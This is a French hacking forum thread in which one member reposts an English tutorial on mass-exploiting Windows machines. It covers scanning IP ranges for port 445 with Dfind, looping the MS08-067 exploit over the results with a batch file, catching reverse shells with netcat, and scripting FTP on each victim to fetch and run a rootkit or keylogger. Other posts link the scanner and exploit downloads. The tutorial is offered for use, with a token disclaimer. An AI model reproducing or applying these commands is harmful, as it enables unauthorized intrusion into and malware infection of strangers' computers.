Dark Angel Index du Forum
Dark Angel
Hacking and Reverse
 
Dark Angel Index du ForumFAQRechercherS’enregistrerConnexion

:: Dfind ::

 
Poster un nouveau sujet   Répondre au sujet    Dark Angel Index du Forum -> Hacking -> Scanners
Sujet précédent :: Sujet suivant  
Auteur Message
Fwank
Membre
Membre

Hors ligne

Inscrit le: 25 Nov 2009
Messages: 100

MessagePosté le: Mer 9 Déc - 08:06 (2009)    Sujet du message: Dfind Répondre en citant

On peut le trouver sur:
http://cerise.confite.free.fr/index.php?last=APPZ
DL direct:
http://cerise.confite.free.fr/APPZ/DFind.rar
et sur:
http://ilosediro.free.fr/dwl.html
http://membres.lycos.fr/sheryozz/DFind.rar

Qcq tutos sur:
http://heapoverflow.com/f0rums/dfind/


Revenir en haut
Publicité






MessagePosté le: Mer 9 Déc - 08:06 (2009)    Sujet du message: Publicité

PublicitéSupprimer les publicités ?
Revenir en haut
Fwank
Membre
Membre

Hors ligne

Inscrit le: 25 Nov 2009
Messages: 100

MessagePosté le: Mer 9 Déc - 08:14 (2009)    Sujet du message: Dfind Répondre en citant

Un tuto, utilisant dfind pour trouver des ports 445 ouverts et lancer un sploit sur les machines:
( http://pastebin.com/pastebin.php?dl=f165ab4d5 )

Turorial for exploiting computers using MS08-067(.exe).

Tools you will need to do this?

Dfind.exe (This will mass scan IP ranges for the vulnerable IP's.)

MS08-067.exe (The universal exploit version, not the chinese one.)

Netcat (To create the reverse shells.)

The above 3 things can be found at the following urls:

Rootkit. You WILL need some kind of payload, depending on what tickles your fancy, some mod of ServU, a keylogger, trojan, whatever you want to send over using the reverse shell. IF YOU DON'T HAVE THIS ALL THE REST IS POINTLESS.

FTP: You will need an ftp for my method, although i'm sure there are plenty of other methods, this is the one I use so will be teaching you.

Before you start, I won't be explaining everything.. i'll just be garunteeing the fact that it will work. If i get lot's of requests for me to explain each bit.. i'll eventually just stop answering. (Although I don't mind answering a few ofc.)

Part0.5:

This is all for educational purposes blah blah, and if you get arrested it wasn't my fault.. etc etc.

Part1: Scanning
Part2: Exploiting
Part3: Netcat
Part4: exploit away!
Part5: Sending/recieving payload.

----------------------------------------------------------------------------
Part1:

Okay so i'm sure you're all aware how this process starts, you need to find IP ranges from fast countries/companies/ISP's.

Easiest way to do this is start > run > cmd.exe

Then type 'nslookup google.co.uk' or whatever. It'll give you their IP range. (The IP used in examples will be google.co.uk's to save confusion.

So, just for ease.. create a folder whereever, and put dfind.exe, ms08-067.exe and netctat all in that folder. For my examples i will be using "C:\ms08-067"

So.. now we're on a roll.

You open another cmd.exe and type "cd c:\ms08-067" (this will change dir to your main 'hack' directory.

In this cmd window you now type:

Code:
dfind.exe -p 445 216.239.1.1 216.239.255.255 2500


Breakdown:

dfind.exe executed this file.

-p sets the port you're scanning for. (445, as this is what the exploit uses.)

216.239.1.1 (start of scan)
216.239.255.255 (end of scan)

2500 is the amount of threads being scanned at a time. If you have a shitty connection, may want to tone this down.

This command will now make a 'Dfind.txt' file, in the same folder as Dfind.

Now sit back and wait for the good times to roll. Or until the scan completes.. whichever comes first.

----------------------------------------------------------------------------
Part2:

So you have a fuckload of :445 scans? awesome!

Open Dfind.txt into a text editor and find+replace ':445' with nothing.
This should leave you a longggg list of just IP's?

rename Dfind.txt to scan.txt.. now proceed:

Now you get to choose, what OS do you want to hit?

# Targets: #
# 01. Windows 2000 EN #
# 02. Windows XP SP0 EN #
# 03. Windows XP SP1 EN #
# 04. Windows XP SP2 EN [DEP BREAK] #
# 05. Windows XP SP2 RU [DEP BREAK] #
# 06. Windows XP SP2 FR [DEP BREAK] #
# 07. Windows XP SP2 IT [DEP BREAK] #
# 08. Windows XP SP2 BR [DEP BREAK] #
# 09. Windows XP SP2 DE [DEP BREAK] #
# 10. Windows XP SP2 CN [DEP BREAK] #
# 11. Windows XP SP3 EN [DEP BREAK] #
# 12. Windows XP SP3 FR [DEP BREAK] #
# 13. Windows XP SP3 ES [DEP BREAK] #
# 14. Windows XP SP3 DE [DEP BREAK] #
# 15. Windows XP SP3 BR [DEP BREAK] #
# 16. Windows 2003 SP0 EN #
# 17. Windows 2003 SP1 EN #
# 18. Windows 2003 SP2 EN #
# 19. Windows 2003 SP1 EN [DEP BREAK] #
# 20. Windows 2003 SP2 EN [DEP BREAK] #
# 21. DOS/Crash/Debug/Test/Fun #


Now obviously, if you just wanna hack'n'slash at as many pc's as possible, 01 is the best option. So for quickest results, all my examples will use 01. But if you decide on going for the rarer Servers, just use 18.

Now you're wondering wtf i'm going on about? well i havn't explained it yet!

Open notepad and type in:

Code:
FOR /F "tokens=1* delims=, " %%i in (scan.txt) do ms08-067.exe -h %%i -t 01 -R <Your IP>:<Any Port>


So say i'm google and doing this, mine would look like:

Code:
FOR /F "tokens=1* delims=, " %%i in (scan.txt) do ms08-067.exe -h %%i -t 01 -R 66.249.93.104:7456


Now save this file as run.BAT .
This batch file will grab each IP individually out of scan.txt and try to exploit each IP for 01 (win 2000).

----------------------------------------------------------------------------
Part3:
Netcat-

Open up notepad again and type in: Code:
nc -L -p 7456 -vv


Now save this file again, but as nc.bat.

This batch file, when ran, will listen on port 7456 and create the reverse shell if the exploit finds any vulneable computers.

----------------------------------------------------------------------------
Part4:

Run NC.bat about 10 times. This will open up a window listening on your specified port.

Run run.bat. This will start attempting to exploit all your IP's from scan.txt.

..what, that's it!

When you're successful, one of the listening windows will show as "c:\WINNT\system32" or something, waiting for you to type in what you want to do.

----------------------------------------------------------------------------
Part5:

Using that FTP of yours!

When you get a command window open for a vulnerable pc, type in this code.. line for line:
(without [ and ]'s)


Code:
echo open [Your.FTP.IP] [PORT.for.FTP] >> ftp1.scr
echo user [LOGIN.to.FTP] >> ftp1.scr
echo [FTP.Password] >> ftp1.scr
echo get [PAYLOAD.EXE] >> ftp1.scr
echo QUIT >> ftp1.scr
ftp -i -n -v -s:ftp1.scr


If you don't understand, god help you. But when you type in that, your vulnerable PC will try to connect to your ftp and retrieve your payload, whatever that may be.

When your victim has retrieved your payload, simply execute it by typing:

'payload.exe'.

----------------------------------------------------------------------------
Part6:

Being patient. Each PC might not retrieve your payload, some might not even execute properly. So just keep trying. Now it's your time to get creative!







This will be the first tutorial of many from TheJeco, we hope you enjoy.. and if you don't, we hope you die. And if you don't think I explained something properly.. please gimme a msg and we'll update it.


Revenir en haut
4l3x
Administrateur
Administrateur

Hors ligne

Inscrit le: 04 Nov 2009
Messages: 96

MessagePosté le: Mer 9 Déc - 11:40 (2009)    Sujet du message: Dfind Répondre en citant

Scan1000

http://www.xup.in/dl,11661587/scan1000.exe/
et
http://www.pdx-gaming.de/praktikum/tools/scan1000.exe
http://www.pdx-gaming.de/praktikum/tools/scan500.exe


Revenir en haut
anmol77


Hors ligne

Inscrit le: 13 Mai 2016
Messages: 1
Localisation: PAKISTAN

MessagePosté le: Ven 13 Mai - 12:09 (2016)    Sujet du message: Dfind Répondre en citant

thanks for everything
°:.:°:.:°:.:°:.:°:.:°:.:°:.:°
== Solitaire ==


Revenir en haut
Contenu Sponsorisé






MessagePosté le: Aujourd’hui à 17:07 (2017)    Sujet du message: Dfind

Revenir en haut
Montrer les messages depuis:   
Poster un nouveau sujet   Répondre au sujet    Dark Angel Index du Forum -> Hacking -> Scanners Toutes les heures sont au format GMT + 1 Heure
Page 1 sur 1

 
Sauter vers:  

Portail | Index | Panneau d’administration | créer forum | Forum gratuit d’entraide | Annuaire des forums gratuits | Signaler une violation | Conditions générales d'utilisation
HalloweenOclock © theme by larme d'ange 2006
Powered by phpBB © 2001, 2005 phpBB Group
Traduction par : phpBB-fr.com